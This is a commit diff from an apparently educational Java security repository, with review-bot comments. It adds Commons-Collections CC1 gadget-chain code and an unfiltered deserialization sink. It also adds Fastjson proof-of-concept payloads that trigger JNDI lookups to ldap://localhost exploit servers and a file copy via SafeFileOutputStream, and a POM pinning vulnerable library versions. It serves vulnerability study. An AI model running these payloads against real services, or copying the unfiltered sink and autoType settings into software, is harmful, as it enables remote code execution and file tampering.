Commit 26b2a0d

committed
🆕修改部分项目代码,以及更新学习路线
1 parent d61cef6 commit 26b2a0d


119 files changed

+1102
-88
lines changed

‎JavaSecurity/CC/CC1/ser.bin‎

-1.24 KB
Binary file not shown.

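--- a/JavaSecurity/CC/CC1/src/EXP/FinalTransformMapEXP/TransformMapEXP.java
+++ b/JavaSecurity/CC/CC1/src/EXP/FinalTransformMapEXP/TransformMapEXP.java
@@ -16,6 +16,7 @@
 public class TransformMapEXP {
 public static void main(String[] args) throws Exception{
 Transformer[] transformers = new Transformer[]{
+new ConstantTransformer(Runtime.class),
 new ConstantTransformer(Runtime.class), // 构造 setValue 的可控参数
 new InvokerTransformer("getMethod",
 new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
@@ -34,7 +35,7 @@ public static void main(String[] args) throws Exception{
 
 // 序列化反序列化
 serialize(o);
-unserialize("ser.bin");
+//unserialize("ser.bin");
 }
 public static void serialize(Object obj) throws IOException {
 ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));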
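Review bot: The line added at new line 19 is an exact copy of the `new ConstantTransformer(Runtime.class)` entry that follows it, so the array now opens with two identical elements and the explanatory comment sits only on the second copy; it reads like a paste slip and one of the two should go. In the second hunk the call is left behind as `//unserialize("ser.bin");` with no reason given. Replacing that dead line with a comment such as `// the read side lives in a separate class so that writing and loading ser.bin are distinct steps` would tell the reader where it went (apparently the `Test` class added in this commit). The middle of `main` and the rest of `serialize` lie outside the visible hunks.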
+17Lines changed: 17 additions & 0 deletions
@@ -0,0 +1,17 @@
1+
import java.io.FileInputStream;
2+
import java.io.IOException;
3+
import java.io.ObjectInputStream;
4+
import java.io.Serializable;
5+
6+
public class Test implements Serializable {
7+
public static void main(String[] args) throws IOException, ClassNotFoundException {
8+
unserialize("ser.bin");
9+
}
10+
11+
public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
12+
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
13+
Object obj = ois.readObject();
14+
15+
return obj;
16+
}
17+
}
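Review bot: `unserialize` never closes the `ObjectInputStream`, and it calls `readObject()` with no deserialization filter, so any gadget library on the classpath (such as the commons-collections used by the CC1 example) makes this call the sink where untrusted bytes turn into behaviour. Since that is presumably deliberate in this lab, say so above the method, e.g. `// intentionally unfiltered demonstration sink; do not copy into application code`, and still release the file handle with `try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename))) { return ois.readObject(); }`. Code that must read serialized data outside a lab should install an allow-list through `ObjectInputFilter` (or the `jdk.serialFilter` property on Java 8 updates) before the first `readObject()`. `implements Serializable` on `Test` is unused, and the parameter would conventionally be spelled `filename`.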
Binary file not shown.
4.47 KB
Binary file not shown.
+43Lines changed: 43 additions & 0 deletions
@@ -0,0 +1,43 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<modelVersion>4.0.0</modelVersion>
6+
7+
<groupId>org.example</groupId>
8+
<artifactId>FastjsonEXP_1.2.62-1.2.68</artifactId>
9+
<version>1.0-SNAPSHOT</version>
10+
<dependencies>
11+
<dependency>
12+
<groupId>com.alibaba</groupId>
13+
<artifactId>fastjson</artifactId>
14+
<version>1.2.68</version>
15+
</dependency>
16+
<dependency>
17+
<groupId>com.esotericsoftware</groupId>
18+
<artifactId>kryo</artifactId>
19+
<version>4.0.0</version>
20+
</dependency>
21+
<dependency>
22+
<groupId>org.aspectj</groupId>
23+
<artifactId>aspectjtools</artifactId>
24+
<version>1.9.5</version>
25+
</dependency>
26+
<dependency>
27+
<groupId>org.apache.xbean</groupId>
28+
<artifactId>xbean-reflect</artifactId>
29+
<version>4.18</version>
30+
</dependency>
31+
<dependency>
32+
<groupId>commons-collections</groupId>
33+
<artifactId>commons-collections</artifactId>
34+
<version>3.2.1</version>
35+
</dependency>
36+
37+
</dependencies>
38+
<properties>
39+
<maven.compiler.source>8</maven.compiler.source>
40+
<maven.compiler.target>8</maven.compiler.target>
41+
</properties>
42+
43+
</project>
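Review bot: Nothing in this POM records that the dependency versions are pinned on purpose. `fastjson` 1.2.68 and `commons-collections` 3.2.1 are the releases the example classes in this commit are written against, so an automated dependency update would break the examples, and a copy of this block into another project would carry the exposure along. A comment above `<dependencies>` such as `<!-- versions pinned deliberately as vulnerable lab targets; do not upgrade automatically or reuse elsewhere -->` would make that explicit.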
+10Lines changed: 10 additions & 0 deletions
@@ -0,0 +1,10 @@
1+
import com.alibaba.fastjson.JSON;
2+
3+
// Fastjson 1.2.68 产生的任意文件读取攻击
4+
public class CopyAttack_1268 {
5+
public static void main(String[] args) {
6+
String poc = "{\"@type\":\"java.lang.AutoCloseable\", \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\", " +
7+
"\"tempPath\":\"C:/Windows/win.ini\", \"targetPath\":\"E:/flag.txt\"}";
8+
JSON.parse(poc);
9+
}
10+
}
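Review bot: The header comment describes an arbitrary file read, while the class is named `CopyAttack_1268` and the payload fields are `tempPath` and `targetPath`; the comment should name the effect actually being demonstrated so the impact is not understated. The file also gives no hint of the defence. A line such as `// blocked when ParserConfig.getGlobalInstance().setSafeMode(true) is set (available from 1.2.68)` would tell a reader which setting stops `JSON.parse` from honouring `@type` at all.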
+12Lines changed: 12 additions & 0 deletions
@@ -0,0 +1,12 @@
1+
import com.alibaba.fastjson.JSON;
2+
import com.alibaba.fastjson.parser.ParserConfig;
3+
import org.apache.xbean.propertyeditor.JndiConverter;
4+
5+
public class EXP_1262 {
6+
public static void main(String[] args) {
7+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
8+
String poc = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\"," +
9+
"\"AsText\":\"ldap://127.0.0.1:1234/ExportObject\"}";
10+
JSON.parse(poc);
11+
}
12+
}
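Review bot: `ParserConfig.getGlobalInstance().setAutoTypeSupport(true)` is the precondition this example depends on as written, and it is undocumented; the same call opens `EXP_1266` and `EXP_1267`. autoType is off by default in these fastjson releases, so a comment like `// autoType is disabled by default; enabled here only to reproduce the issue, never enable it on the global ParserConfig in application code` keeps a reader from assuming a default configuration behaves this way, or from copying the line. The `JndiConverter` import is never referenced as a type (the class appears only inside the string) and can be dropped.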
+14Lines changed: 14 additions & 0 deletions
@@ -0,0 +1,14 @@
1+
import com.alibaba.fastjson.JSON;
2+
import com.alibaba.fastjson.parser.ParserConfig;
3+
4+
public class EXP_1266 {
5+
public static void main(String[] args) {
6+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
7+
String poc = "{\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":[\"ldap://localhost:1234/ExportObject\"], \"Realms\":[\"\"]}";
8+
// String poc = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"ldap://localhost:1389/Exploit\"}";
9+
// String poc = "{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"ldap://localhost:1389/Exploit\"}";
10+
// String poc = "{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\"," +
11+
// "\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"ldap://localhost:1389/Exploit\"}}";
12+
JSON.parse(poc);
13+
}
14+
}
+12Lines changed: 12 additions & 0 deletions
@@ -0,0 +1,12 @@
1+
import com.alibaba.fastjson.JSON;
2+
import com.alibaba.fastjson.parser.ParserConfig;
3+
import com.sun.xml.internal.ws.api.ha.StickyFeature;
4+
5+
public class EXP_1267 {
6+
public static void main(String[] args) {
7+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
8+
String poc = "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\"," +
9+
" \"jndiNames\":[\"ldap://localhost:1234/ExportObject\"], \"tm\": {\"$ref\":\"$.tm\"}}";
10+
JSON.parse(poc);
11+
}
12+
}
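Review bot: The import `com.sun.xml.internal.ws.api.ha.StickyFeature` on line 3 is never used in this class and looks like an IDE auto-import. It names a JDK-internal package that went away with the JAX-WS modules in JDK 11, so the file compiles only on a JDK that still ships it. Delete the line.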
